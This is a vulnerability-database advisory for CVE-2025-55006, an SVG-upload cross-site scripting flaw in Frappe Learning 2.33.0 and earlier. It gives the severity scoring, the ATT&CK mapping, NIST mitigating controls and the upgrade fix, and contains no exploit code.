CVE-2025-55006
Published: 09 August 2025
Summary
CVE-2025-55006 is a medium-severity Improper Input Validation (CWE-20) vulnerability in Frappe Learning. Its CVSS base score is 4.3 (Medium).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 42.9% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-55006 is an improper input validation vulnerability (CWE-20) in Frappe Learning, a learning management system for structuring content. It affects versions 2.33.0 and below, specifically in the image upload functionality, which fails to adequately sanitize uploaded SVG files. This allows attackers to upload SVGs containing embedded JavaScript or other malicious content.
The vulnerability has a CVSS v3.1 base score of 4.3 (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L). Exploitation requires an authenticated attacker with high privileges to upload a malicious SVG via the image upload feature. When other users view or interact with the uploaded image, the embedded scripts execute in the victim's browser context, enabling arbitrary script execution such as cross-site scripting (XSS).
The GitHub security advisory (GHSA-mvxw-r9x4-3vrr) documents the issue. Mitigation involves upgrading to version 2.34.0, where a fix is planned.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-24031
Vulnerability details
Frappe Learning is a learning system that helps users structure their content. In versions 2.33.0 and below, the image upload functionality did not adequately sanitize uploaded SVG files. This allowed users to upload SVG files containing embedded JavaScript or other…
more
potentially malicious content. Malicious SVG files could be used to execute arbitrary scripts in the context of other users. A fix for this issue is planned for version 2.34.0.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Vulnerability in public-facing LMS image upload enables direct exploitation (T1190) and delivery/execution of JS payloads via unsanitized SVGs (T1059.007, T1027.017).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires validation and sanitization of all input, including uploaded SVG files, to block embedded scripts before storage or rendering.
Mandates mechanisms to detect and block malicious code (e.g., embedded JavaScript) within user-uploaded content such as SVGs.
Requires filtering of information outputs to remove or neutralize active content such as scripts before delivery to other users' browsers.